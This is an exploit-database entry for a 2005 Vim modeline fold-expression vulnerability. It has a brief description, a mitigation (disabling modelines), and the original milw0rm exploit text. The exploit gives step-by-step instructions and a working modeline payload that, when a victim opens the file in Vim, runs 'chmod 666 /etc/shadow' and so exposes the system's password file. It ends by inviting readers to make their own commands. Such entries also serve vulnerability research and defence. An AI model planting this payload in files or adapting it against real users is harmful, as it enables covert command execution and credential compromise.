header-logo
Suggest Exploit
vendor:
Vim Text Editor
by:
str0ke
7,5
CVSS
HIGH
Command Execution
78
CWE
Product Name: Vim Text Editor
Affected Version From: Vim 5.x
Affected Version To: Vim 7.x
Patch Exists: No
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: All
2005

Vim Fold Expression Command Execution Vulnerability

This vulnerability allows an attacker to execute arbitrary commands when a user opens a text file with Vim. The attacker can insert a malicious fold expression at the top of the file, which will be executed when the file is opened. This can be used to gain access to the system, as the command can be used to change the permissions of a file, such as /etc/shadow.

Mitigation:

Disable the 'modeline' option in Vim, or use a different text editor.
Source

Exploit-DB raw data:

1) open up a text file.

2) insert at the top the information (below).

/* vim: foldmethod=expr:foldexpr=glob("`chmod\ 666\ /etc/shadow`") */

3) if modlines = on anyone that opens the file with vim will execute the command:
   chmod 666 /etc/shadow
   
Have fun making your own commands.

The advisory can be found at:
  http://www.guninski.com/where_do_you_want_billg_to_go_today_5.html

/str0ke

# milw0rm.com [2005-07-25]

Navigation

Suggest Exploit

Services By CQR